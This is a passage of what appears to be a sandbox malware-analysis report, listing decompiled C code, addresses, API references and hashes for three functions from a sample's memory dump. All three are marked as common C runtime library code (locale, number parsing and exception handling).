                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction ID: 8f06ba0e6be14d774fc29792ef997f0c6ad8488ad82e83f8fd62a1598589dc5c
                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction Fuzzy Hash: D5118C3204014EBBCF165F85DD01CEE3F62BB18354B588416FE2898131D37AC9B2AB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040FEBC Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E0040FEBC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x418500);
				E00409480(__ebx, __edi, __esi);
				_t29 = E00408BF1(__ebx, __edx, _t31);
				_t13 =  *0x41aed8; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E0040E117(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x41a998; // 0x41a8c0
					 *((intOrPtr*)(_t30 - 0x1c)) = E0040FE7E(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E0040FF26();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00408BF1(_t22, __edx, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E0040C2BD(_t25, 0x20);
				}
				return E004094C5(_t29);
			}








                    0x0040febc
                    0x0040febc
                    0x0040febc
                    0x0040febc
                    0x0040febc
                    0x0040febe
                    0x0040fec3
                    0x0040fecd
                    0x0040fecf
                    0x0040fed7
                    0x0040fefb
                    0x0040fefd
                    0x0040ff03
                    0x0040ff07
                    0x0040ff0a
                    0x0040ff15
                    0x0040ff18
                    0x0040ff1f
                    0x0040fed9
                    0x0040fed9
                    0x0040fedd
                    0x00000000
                    0x0040fedf
                    0x0040fee4
                    0x0040fee4
                    0x0040fedd
                    0x0040fee9
                    0x0040feed
                    0x0040fef2
                    0x0040fefa

                    APIs
                    • __getptd.LIBCMT ref: 0040FEC8
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __getptd.LIBCMT ref: 0040FEDF
                    • __amsg_exit.LIBCMT ref: 0040FEED
                    • __lock.LIBCMT ref: 0040FEFD
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                    • String ID:
                    • API String ID: 3521780317-0
                    • Opcode ID: c31208280f86fe4ea88bcf67dfbc4a712ec562fcafcadeb5e848c2026da5a72e
                    • Instruction ID: d6d50973cace414a26329c4f120845ccf474262a96aeb2299d56b6e64742e815
                    • Opcode Fuzzy Hash: c31208280f86fe4ea88bcf67dfbc4a712ec562fcafcadeb5e848c2026da5a72e
                    • Instruction Fuzzy Hash: AAF06231901700DAD731EBA9C40278E73A06B00718F11857FF454B7AE3CB7C99499A9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B45C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E0040B45C(intOrPtr _a4, intOrPtr* _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				char _v24;
				void* __edi;
				void* __esi;
				intOrPtr* _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t100;
				signed int _t101;
				intOrPtr* _t102;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				intOrPtr _t107;
				signed int _t108;
				void* _t109;
				void* _t110;
				intOrPtr* _t113;
				signed char _t118;
				signed int _t122;
				char _t124;
				signed int _t126;
				signed int _t129;
				signed int _t130;
				signed int _t134;
				signed int _t136;
				intOrPtr _t137;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t140;
				void* _t142;

				E0040988F( &_v24, _a4);
				_t91 = _a12;
				_t139 = _a8;
				if(_t91 != 0) {
					 *_t91 = _t139;
				}
				if(_t139 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L9:
						_t124 = _v24;
						_t118 =  *_t139;
						_v8 = 0;
						_t14 = _t139 + 1; // 0x1
						_t136 = _t14;
						while(1) {
							__eflags =  *((intOrPtr*)(_t124 + 0xac)) - 1;
							if( *((intOrPtr*)(_t124 + 0xac)) <= 1) {
								_t132 =  *((intOrPtr*)(_t124 + 0xc8));
								_t94 =  *( *((intOrPtr*)(_t124 + 0xc8)) + (_t118 & 0x000000ff) * 2) & 8;
								__eflags = _t94;
							} else {
								_t94 = E004126F4(_t132, _t118 & 0x000000ff, 8,  &_v24);
								_t124 = _v24;
								_t142 = _t142 + 0xc;
							}
							__eflags = _t94;
							if(_t94 == 0) {
								break;
							}
							_t118 =  *_t136;
							_t136 = _t136 + 1;
						}
						__eflags = _t118 - 0x2d;
						if(_t118 != 0x2d) {
							__eflags = _t118 - 0x2b;
							if(_t118 != 0x2b) {
								L19:
								_t95 = _a16;
								__eflags = _t95;
								if(_t95 < 0) {
									L68:
									_t96 = _a12;
									__eflags = _t96;
									if(_t96 != 0) {
										 *_t96 = _t139;
									}
									__eflags = _v12;
									if(_v12 != 0) {
										_t98 = _v16;
										_t88 = _t98 + 0x70;
										 *_t88 =  *(_t98 + 0x70) & 0xfffffffd;
										__eflags =  *_t88;
									}
									_t97 = 0;
									__eflags = 0;
									L73:
									return _t97;
								}
								__eflags = _t95 - 1;
								if(_t95 == 1) {
									goto L68;
								}
								__eflags = _t95 - 0x24;
								if(_t95 > 0x24) {
									goto L68;
								}
								__eflags = _t95;
								if(_t95 != 0) {
									__eflags = _t95 - 0x10;
									if(_t95 != 0x10) {
										L34:
										_t140 =  *((intOrPtr*)(_t124 + 0xc8));
										_t30 = 0xffffffff % _a16;
										__eflags = _t30;
										_t100 = 0xffffffff / _a16;
										_t134 = _t30;
										while(1) {
											_t126 =  *(_t140 + (_t118 & 0x000000ff) * 2) & 0x0000ffff;
											__eflags = _t126 & 0x00000004;
											if((_t126 & 0x00000004) == 0) {
												goto L37;
											}
											_t130 = _t118 - 0x30;
											L41:
											__eflags = _t130 - _a16;
											if(_t130 >= _a16) {
												L46:
												_t101 = _a20;
												_t137 = _t136 - 1;
												__eflags = _t101 & 0x00000008;
												if((_t101 & 0x00000008) != 0) {
													__eflags = _t101 & 0x00000004;
													if((_t101 & 0x00000004) != 0) {
														L58:
														_t102 = E00407E97();
														__eflags = _a20 & 0x00000001;
														 *_t102 = 0x22;
														if((_a20 & 0x00000001) == 0) {
															__eflags = _a20 & 0x00000002;
															_t103 = 0;
															_t105 = (_t103 & 0xffffff00 | (_a20 & 0x00000002) != 0x00000000) + 0x7fffffff;
															__eflags = _t105;
															_v8 = _t105;
														} else {
															_v8 = _v8 | 0xffffffff;
														}
														L61:
														_t106 = _a12;
														__eflags = _t106;
														if(_t106 != 0) {
															 *_t106 = _t137;
														}
														__eflags = _a20 & 0x00000002;
														if((_a20 & 0x00000002) != 0) {
															_v8 =  ~_v8;
														}
														__eflags = _v12;
														if(_v12 != 0) {
															_t107 = _v16;
															_t82 = _t107 + 0x70;
															 *_t82 =  *(_t107 + 0x70) & 0xfffffffd;
															__eflags =  *_t82;
														}
														_t97 = _v8;
														goto L73;
													}
													__eflags = _t101 & 0x00000001;
													if((_t101 & 0x00000001) != 0) {
														goto L61;
													}
													_t108 = _t101 & 0x00000002;
													__eflags = _t108;
													if(_t108 == 0) {
														L56:
														__eflags = _t108;
														if(_t108 != 0) {
															goto L61;
														}
														__eflags = _v8 - 0x7fffffff;
														if(_v8 <= 0x7fffffff) {
															goto L61;
														}
														goto L58;
													}
													__eflags = _v8 - 0x80000000;
													if(_v8 > 0x80000000) {
														goto L58;
													}
													goto L56;
												}
												__eflags = _a12;
												if(_a12 != 0) {
													_t137 = _a8;
												}
												_v8 = _v8 & 0x00000000;
												goto L61;
											}
											_a20 = _a20 | 0x00000008;
											__eflags = _v8 - _t100;
											if(__eflags < 0) {
												L50:
												_t122 = _v8 * _a16 + _t130;
												__eflags = _t122;
												_v8 = _t122;
												L51:
												_t118 =  *_t136;
												_t136 = _t136 + 1;
												continue;
											}
											if(__eflags != 0) {
												L45:
												_a20 = _a20 | 0x00000004;
												__eflags = _a12;
												if(_a12 != 0) {
													goto L51;
												}
												goto L46;
											}
											__eflags = _t130 - _t134;
											if(_t130 <= _t134) {
												goto L50;
											}
											goto L45;
											L37:
											__eflags = _t126 & 0x00000103;
											if((_t126 & 0x00000103) == 0) {
												goto L46;
											}
											__eflags = _t118 - 0x61 - 0x19;
											_t129 = _t118;
											if(_t118 - 0x61 <= 0x19) {
												_t129 = _t129 - 0x20;
												__eflags = _t129;
											}
											_t130 = _t129 + 0xffffffc9;
											__eflags = _t130;
											goto L41;
										}
									}
									__eflags = _t118 - 0x30;
									if(_t118 != 0x30) {
										goto L34;
									}
									L31:
									_t109 =  *_t136;
									__eflags = _t109 - 0x78;
									if(_t109 == 0x78) {
										L33:
										_t138 = _t136 + 1;
										_t118 =  *_t138;
										_t136 = _t138 + 1;
										__eflags = _t136;
										goto L34;
									}
									__eflags = _t109 - 0x58;
									if(_t109 != 0x58) {
										goto L34;
									}
									goto L33;
								}
								__eflags = _t118 - 0x30;
								if(_t118 == 0x30) {
									_t110 =  *_t136;
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L28:
										_a16 = 0x10;
										goto L31;
									}
									__eflags = _t110 - 0x58;
									if(_t110 == 0x58) {
										goto L28;
									}
									_a16 = 8;
									goto L34;
								}
								_a16 = 0xa;
								goto L34;
							}
							L18:
							_t118 =  *_t136;
							_t136 = _t136 + 1;
							__eflags = _t136;
							goto L19;
						}
						_a20 = _a20 | 0x00000002;
						goto L18;
					}
					__eflags = _a16 - 2;
					if(_a16 < 2) {
						goto L3;
					}
					__eflags = _a16 - 0x24;
					if(_a16 > 0x24) {
						goto L3;
					}
					goto L9;
				} else {
					L3:
					_t113 = E00407E97();
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t113 = 0x16;
					E00406B09(_t132, 0, _t139);
					if(_v12 != 0) {
						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
					}
					return 0;
				}
			}







































                    0x0040b46c
                    0x0040b471
                    0x0040b474
                    0x0040b47b
                    0x0040b47d
                    0x0040b47d
                    0x0040b481
                    0x0040b4af
                    0x0040b4b2
                    0x0040b4c0
                    0x0040b4c0
                    0x0040b4c4
                    0x0040b4c6
                    0x0040b4c9
                    0x0040b4c9
                    0x0040b4cc
                    0x0040b4cc
                    0x0040b4d3
                    0x0040b4ec
                    0x0040b4f9
                    0x0040b4f9
                    0x0040b4d5
                    0x0040b4df
                    0x0040b4e4
                    0x0040b4e7
                    0x0040b4e7
                    0x0040b4fc
                    0x0040b4fe
                    0x00000000
                    0x00000000
                    0x0040b500
                    0x0040b502
                    0x0040b502
                    0x0040b505
                    0x0040b508
                    0x0040b510
                    0x0040b513
                    0x0040b518
                    0x0040b518
                    0x0040b51b
                    0x0040b51d
                    0x0040b66e
                    0x0040b66e
                    0x0040b671
                    0x0040b673
                    0x0040b675
                    0x0040b675
                    0x0040b677
                    0x0040b67b
                    0x0040b67d
                    0x0040b680
                    0x0040b680
                    0x0040b680
                    0x0040b680
                    0x0040b684
                    0x0040b684
                    0x0040b686
                    0x00000000
                    0x0040b686
                    0x0040b523
                    0x0040b526
                    0x00000000
                    0x00000000
                    0x0040b52c
                    0x0040b52f
                    0x00000000
                    0x00000000
                    0x0040b535
                    0x0040b537
                    0x0040b563
                    0x0040b566
                    0x0040b57b
                    0x0040b57b
                    0x0040b588
                    0x0040b588
                    0x0040b588
                    0x0040b588
                    0x0040b58b
                    0x0040b58e
                    0x0040b592
                    0x0040b595
                    0x00000000
                    0x00000000
                    0x0040b59a
                    0x0040b5ba
                    0x0040b5ba
                    0x0040b5bd
                    0x0040b5d8
                    0x0040b5d8
                    0x0040b5db
                    0x0040b5dc
                    0x0040b5de
                    0x0040b605
                    0x0040b607
                    0x0040b624
                    0x0040b624
                    0x0040b629
                    0x0040b62d
                    0x0040b633
                    0x0040b63b
                    0x0040b641
                    0x0040b645
                    0x0040b645
                    0x0040b647
                    0x0040b635
                    0x0040b635
                    0x0040b635
                    0x0040b64a
                    0x0040b64a
                    0x0040b64d
                    0x0040b64f
                    0x0040b651
                    0x0040b651
                    0x0040b653
                    0x0040b657
                    0x0040b659
                    0x0040b659
                    0x0040b65c
                    0x0040b660
                    0x0040b662
                    0x0040b665
                    0x0040b665
                    0x0040b665
                    0x0040b665
                    0x0040b669
                    0x00000000
                    0x0040b669
                    0x0040b609
                    0x0040b60b
                    0x00000000
                    0x00000000
                    0x0040b60d
                    0x0040b60d
                    0x0040b610
                    0x0040b61b
                    0x0040b61b
                    0x0040b61d
                    0x00000000
                    0x00000000
                    0x0040b61f
                    0x0040b622
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040b622
                    0x0040b612
                    0x0040b619
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040b619
                    0x0040b5e0
                    0x0040b5e4
                    0x0040b5e6
                    0x0040b5e6
                    0x0040b5e9
                    0x00000000
                    0x0040b5e9
                    0x0040b5bf
                    0x0040b5c3
                    0x0040b5c6
                    0x0040b5ef
                    0x0040b5f6
                    0x0040b5f6
                    0x0040b5f8
                    0x0040b5fb
                    0x0040b5fb
                    0x0040b5fd
                    0x00000000
                    0x0040b5fd
                    0x0040b5c8
                    0x0040b5ce
                    0x0040b5ce
                    0x0040b5d2
                    0x0040b5d6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040b5d6
                    0x0040b5ca
                    0x0040b5cc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040b59f
                    0x0040b59f
                    0x0040b5a5
                    0x00000000
                    0x00000000
                    0x0040b5ac
                    0x0040b5af
                    0x0040b5b2
                    0x0040b5b4
                    0x0040b5b4
                    0x0040b5b4
                    0x0040b5b7
                    0x0040b5b7
                    0x00000000
                    0x0040b5b7
                    0x0040b58b
                    0x0040b568
                    0x0040b56b
                    0x00000000
                    0x00000000
                    0x0040b56d
                    0x0040b56d
                    0x0040b56f
                    0x0040b571
                    0x0040b577
                    0x0040b577
                    0x0040b578
                    0x0040b57a
                    0x0040b57a
                    0x00000000
                    0x0040b57a
                    0x0040b573
                    0x0040b575
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040b575
                    0x0040b539
                    0x0040b53c
                    0x0040b547
                    0x0040b549
                    0x0040b54b
                    0x0040b55a
                    0x0040b55a
                    0x00000000
                    0x0040b55a
                    0x0040b54d
                    0x0040b54f
                    0x00000000
                    0x00000000
                    0x0040b551
                    0x00000000
                    0x0040b551
                    0x0040b53e
                    0x00000000
                    0x0040b53e
                    0x0040b515
                    0x0040b515
                    0x0040b517
                    0x0040b517
                    0x00000000
                    0x0040b517
                    0x0040b50a
                    0x00000000
                    0x0040b50a
                    0x0040b4b4
                    0x0040b4b8
                    0x00000000
                    0x00000000
                    0x0040b4ba
                    0x0040b4be
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040b483
                    0x0040b483
                    0x0040b483
                    0x0040b488
                    0x0040b489
                    0x0040b48a
                    0x0040b48b
                    0x0040b48c
                    0x0040b48d
                    0x0040b493
                    0x0040b49f
                    0x0040b4a4
                    0x0040b4a4
                    0x00000000
                    0x0040b4a8

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B46C
                      • Part of subcall function 0040988F: __getptd.LIBCMT ref: 004098A2
                    • __isctype_l.LIBCMT ref: 0040B4DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: Locale$UpdateUpdate::___getptd__isctype_l
                    • String ID: $
                    • API String ID: 3484633779-3993045852
                    • Opcode ID: b055181225d9e05ad2f6405d1f8b39b84fb2feaad8181f7a1a545ce3a99edec4
                    • Instruction ID: 97537141d6d2858a3edd09e828bcdb1ecb2a0de928e4cfbf47729112040edc5f
                    • Opcode Fuzzy Hash: b055181225d9e05ad2f6405d1f8b39b84fb2feaad8181f7a1a545ce3a99edec4
                    • Instruction Fuzzy Hash: 3B71D270900249AADF25CF28C9557AB7BA0EF51358F2805BBE851B62D1C3398E91C7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040D36B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E0040D36B(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E004079F9(__ebx, __edi,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00408BF1(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00408BF1(__ebx, __edx, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
							_t17 = E004079D2( *((intOrPtr*)(_t28 + 0x18)));
							_t38 = _t17;
							if(_t17 != 0) {
								_push( *((intOrPtr*)(_t29 + 0x10)));
								_push(_t28);
								return E0040D103(_t38);
							}
						}
					}
				}
				return _t17;
			}







                    0x0040d36b
                    0x0040d36b
                    0x0040d36e
                    0x0040d374
                    0x0040d382
                    0x0040d388
                    0x0040d390
                    0x0040d39c
                    0x0040d3a4
                    0x0040d3ac
                    0x0040d3c0
                    0x0040d3cb
                    0x0040d3d1
                    0x0040d3d3
                    0x0040d3d5
                    0x0040d3d8
                    0x00000000
                    0x0040d3df
                    0x0040d3d3
                    0x0040d3c0
                    0x0040d3ac
                    0x0040d3e0

                    APIs
                      • Part of subcall function 004079F9: __getptd.LIBCMT ref: 004079FF
                      • Part of subcall function 004079F9: __getptd.LIBCMT ref: 00407A0F
                    • __getptd.LIBCMT ref: 0040D37A
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __getptd.LIBCMT ref: 0040D388
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: c3226e5914c2fafcc7b7aa0dcbfd0320ad9f523a7d8779f82bba664e6cdc0096
                    • Instruction ID: 5255ad6bef1b04d00a052ecb8c38c34e1b8380bf0492bfbde4a4986204fe29fe
                    • Opcode Fuzzy Hash: c3226e5914c2fafcc7b7aa0dcbfd0320ad9f523a7d8779f82bba664e6cdc0096
                    • Instruction Fuzzy Hash: 03014B75C00205DACF389FA9C4816AEB7B5AF10315F54443FE841B67D2CBB8A998DB4A
                    Uniqueness

                    Uniqueness Score: -1.00%